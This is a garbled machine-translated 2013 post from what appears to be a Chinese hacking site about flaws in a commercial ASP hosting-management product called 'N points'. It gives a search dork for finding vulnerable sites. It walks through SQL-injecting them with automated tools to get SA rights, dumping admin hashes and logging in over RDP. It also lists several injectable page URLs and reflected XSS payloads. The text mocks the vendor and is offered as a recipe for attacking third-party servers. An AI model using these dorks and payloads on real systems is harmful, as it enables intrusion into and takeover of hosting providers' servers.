N the point of the commercial version vulnerabilities pass to kill 0day and the use of the method-vulnerability warning-the black bar safety net

2013-03-02T00:00:00
ID MYHACK58:62201337550
Type myhack58
Reporter 佚名
Modified 2013-03-02T00:00:00

Description

Have to say the N points is really a shit Even if he developed the commercial version, even if a commercial version comes with security settings also can not conceal his junk. Well complaining about it on the line next critical time to First of all Baidu search keywords: inurl: (mmdatabase. asp) I just listed one: www.xxxx.com Modify the link: http://www.xxxx.com:80/Style/news.asp?action=true&RID=1&ID=1 Throw into the NBSI or. D and other various stupid tool You will see the SA permissions Decisively 3 3 8 9 up hash to get the administrator password Wipe and leave.~ Through friends I test 1 0 This app more than 5 have this vulnerability 5 inside half of the SA permissions

Then attach several other vulnerabilities page SQL: http://www.xxxxxx.com:80/Style/flashad/flashad.asp?adid=1 http://www.xxxxxx.com:80/Manage/CreateHost.asp?Url=/Style/memberlogin.asp&PID=1 1 http://www.xxxxxx.com:80/Manage/CreateMySQL.asp?Url=/Style/memberlogin.asp&PID=9 http://www.xxxxxx.com:80/Style/vhosting.asp?classID=2 XSSproof: http://www.xxxxxx.com:80/Manage/CreateHost.asp?PID=11&Url=/Style/memberlogin. asp”;alert(4 2 8 7 3);” http://www.xxxxxx.com:80/Manage/CreateMySQL.asp?PID=9&Url=/Style/memberlogin. asp”;alert(4 2 8 7 3);” http://www.xxxxxx.com:80/Style/domainInquiry.asp?dfcn=true?cndns=88888&button4=8 8 8 8 8&checkbox2=. bj. cn<script>alert(4 2 8 7 3)</script> Thus the point is to pit force fighter in the since with him my tears are drained with do IDC friends do not step my footsteps Ah, cheap no good goods good goods are not cheap Or Star outside the bar you know As a commercial program security is so poor even online open-source some of the procedures are somewhat inferior, so that the company can go far? PS: I really want to know what you say N points of the SB to asp on asp. why asp also have to MSSQL this is not like telling our soon to Japan. we are easy to day, the pants are off it, just like you. o(︶︿︶)o alas ---END